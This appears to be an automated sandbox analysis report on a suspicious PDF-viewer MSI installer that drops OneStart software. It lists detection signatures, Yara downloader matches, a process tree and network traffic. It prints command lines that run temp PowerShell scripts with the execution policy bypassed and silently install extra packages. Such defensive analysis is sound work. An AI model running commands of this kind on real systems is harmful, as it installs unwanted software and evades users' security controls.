Windows Analysis Report
PDFViewer_44882564 (1).msi

Overview

General Information

Sample Name: PDFViewer_44882564 (1).msi
Analysis ID: 1298923
MD5: 299098d3040c4ad8e52e0835e82c4ca7
SHA1: 4a0e233aee3854a957baac068370394a571078a3
SHA256: 39c81ea1223edf1f79d04ff5baefa8b2b95b9844972d564ef769dce3cab555c9

Detection

Score: 45
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Compliance

Score: 31
Range: 0 - 100

Signatures

Tries to open files direct via NTFS file id
Creates multiple autostart registry keys
Bypasses PowerShell execution policy
Yara detected Generic Downloader
Creates autostart registry keys with suspicious values (likely registry only malware)
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Creates files inside the system directory
Stores large binary data to the registry
Creates job files (autostart)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
EXE planting / hijacking vulnerabilities found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
DLL planting / hijacking vulnerabilities found
Adds / modifies Windows certificates
Drops PE files
Tries to load missing DLLs
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)

Classification

Classification chart axes: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (legend: clean, suspicious, malicious)
  • System is w10x64_ra
  • msiexec.exe (PID: 6756 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi" MD5: 2D9F692E71D9985F1C6237F063F6FE76)
  • msiexec.exe (PID: 6480 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 2D9F692E71D9985F1C6237F063F6FE76)
    • msiexec.exe (PID: 6508 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 5ADB98630CC4B226B2004FF6626A3D5C C MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • powershell.exe (PID: 3544 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9362.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 6700 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA3D1.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 3184 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssB4FB.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 3416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 1484 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC80A.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 1264 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE3B5.tmp.ps1" MD5: CDA48FC75952AD12D99E526D0B6BF70A)
        • conhost.exe (PID: 3900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • msiexec.exe (PID: 1588 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\OneStartBarSetup.msi" /qn MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • msiexec.exe (PID: 4100 cmdline: "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\WCSetup_OstWC.msi" /q MD5: F9A3EEE1C3A4067702BC9A59BC894285)
    • msiexec.exe (PID: 6780 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 89BFE6A67EA52C9D6229530A7603552C C MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • powershell.exe (PID: 6460 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss14E.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 2328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 5172 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss338E.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 5580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 1548 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss5F45.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 2620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 4732 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9D9A.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 3132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 4748 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssDFC8.tmp.ps1" MD5: CDA48FC75952AD12D99E526D0B6BF70A)
        • conhost.exe (PID: 5468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
    • msiexec.exe (PID: 6792 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 7B048B739A129C4760975253DFD4D71B MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • powershell.exe (PID: 4272 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss68A3.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 7152 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC2FC.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
    • msiexec.exe (PID: 3924 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 0149F3E23FD7725D047AE755BC5E69BF MD5: F9A3EEE1C3A4067702BC9A59BC894285)
      • powershell.exe (PID: 4320 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss129F.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
      • powershell.exe (PID: 3604 cmdline: -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7063.tmp.ps1" MD5: BCC5A6493E0641AA1E60CBF69469E579)
        • conhost.exe (PID: 4728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: C5E9B1D1103EDCEA2E408E9497A5A88F)
  • msiexec.exe (PID: 2240 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi" MD5: 2D9F692E71D9985F1C6237F063F6FE76)
  • cleanup

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

No Sigma rule has matched
No Snort rule has matched


Compliance

          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.SecureString.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.TraceSource.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.RegularExpressions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\HtmlAgilityPack.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Expressions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Reflection.Extensions.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_codecvt_ids.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.DriveInfo.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\vcruntime140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Security.Cryptography.Csp.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.ZipFile.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.ReaderWriter.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.AppContext.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.WindowsAPICodePack.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Diagnostics.Tracing.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.Compression.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Http.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Memory.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Overlapped.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\vccorlib140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.WebSockets.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.UnmanagedMemoryStream.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.Writer.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Linq.Parallel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Resources.ResourceManager.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140_atomic_wait.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Collections.Concurrent.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encodings.Web.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Xaml.Behaviors.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Drawing.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.FileSystem.Primitives.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ObjectModel.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\FluentWPF.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.ThreadPool.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\msvcp140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.Http.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Net.Ping.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\websocket-sharp.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Numerics.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Flurl.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Xml.XDocument.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.InteropServices.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\Microsoft.Bcl.AsyncInterfaces.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Text.Encoding.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.IO.IsolatedStorage.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ValueTuple.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\concrt140.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Threading.Timer.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.ComponentModel.EventBasedAsync.dll
          Source: C:\Windows\System32\msiexec.exeDLL: C:\Users\user\AppData\Roaming\OneStart\bar\System.Runtime.Serialization.Primitives.dll
          Source: unknownHTTPS traffic detected: 18.165.201.17:443 -> 192.168.2.3:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 143.204.9.38:443 -> 192.168.2.3:49764 version: TLS 1.2
          Source: PDFViewer_44882564 (1).msiStatic PE information: certificate valid
          Source: C:\Windows\System32\msiexec.exeFile opened: z:
          Source: C:\Windows\System32\msiexec.exeFile opened: x:
          Source: C:\Windows\System32\msiexec.exeFile opened: v:
          Source: C:\Windows\System32\msiexec.exeFile opened: t:
          Source: C:\Windows\System32\msiexec.exeFile opened: r:
          Source: C:\Windows\System32\msiexec.exeFile opened: p:
          Source: C:\Windows\System32\msiexec.exeFile opened: n:
          Source: C:\Windows\System32\msiexec.exeFile opened: l:
          Source: C:\Windows\System32\msiexec.exeFile opened: j:
          Source: C:\Windows\System32\msiexec.exeFile opened: h:
          Source: C:\Windows\System32\msiexec.exeFile opened: f:
          Source: C:\Windows\System32\msiexec.exeFile opened: b:
          Source: C:\Windows\System32\msiexec.exeFile opened: y:
          Source: C:\Windows\System32\msiexec.exeFile opened: w:
          Source: C:\Windows\System32\msiexec.exeFile opened: u:
          Source: C:\Windows\System32\msiexec.exeFile opened: s:
          Source: C:\Windows\System32\msiexec.exeFile opened: q:
          Source: C:\Windows\System32\msiexec.exeFile opened: o:
          Source: C:\Windows\System32\msiexec.exeFile opened: m:
          Source: C:\Windows\System32\msiexec.exeFile opened: k:
          Source: C:\Windows\System32\msiexec.exeFile opened: i:
          Source: C:\Windows\System32\msiexec.exeFile opened: g:
          Source: C:\Windows\System32\msiexec.exeFile opened: e:
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: c:
          Source: C:\Windows\System32\msiexec.exeFile opened: a:

          Networking

          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\OneStart\bar\netstandard.dll, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\OneStart\bar\DBar.exe, type: DROPPED
          Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Host: dpseqd9pkrc26.cloudfront.net Content-Length: 183 Expect: 100-continue Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Host: d1xdao0g1hqd47.cloudfront.net Content-Length: 112 Expect: 100-continue Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Host: d1xdao0g1hqd47.cloudfront.net Content-Length: 115 Expect: 100-continue Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Host: dhb63vq2dmigo.cloudfront.net Content-Length: 140 Expect: 100-continue Connection: Keep-Alive
          Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Host: dhb63vq2dmigo.cloudfront.net Content-Length: 176 Expect: 100-continue
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknown HTTP traffic detected: POST / HTTP/1.1 Host: dpseqd9pkrc26.cloudfront.net Content-Length: 183 Expect: 100-continue Connection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: dpseqd9pkrc26.cloudfront.net
          Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI6798.tmp
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\656517.msi
          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
          Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\PDFViewer_44882564 (1).msi"
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5ADB98630CC4B226B2004FF6626A3D5C C
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9362.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssA3D1.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssB4FB.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC80A.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssE3B5.tmp.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 89BFE6A67EA52C9D6229530A7603552C C
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss14E.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss338E.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss5F45.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\OneStartBarSetup.msi" /qn
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 7B048B739A129C4760975253DFD4D71B
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss68A3.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss9D9A.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssC2FC.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssDFC8.tmp.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\OneStart.ai\OneStart Software\prerequisites\WCSetup_OstWC.msi" /q
          Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0149F3E23FD7725D047AE755BC5E69BF
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss129F.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss7063.tmp.ps1"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process where name = 'msiexec.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\BBWC
          Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI914C.tmp
          Source: classification engineClassification label: mal45.troj.evad.winMSI@53/186@10/21
          Source: C:\Windows\System32\msiexec.exeFile read: C:\Users\user\AppData\Roaming\OneStart\bar\updater.ini
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\bf92dcc11e428fd5adf02632b5d4414f\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ec23d1294499b4ffba61f212cb1217cd\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3900:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3132:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5580:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2328:120:WilError_02
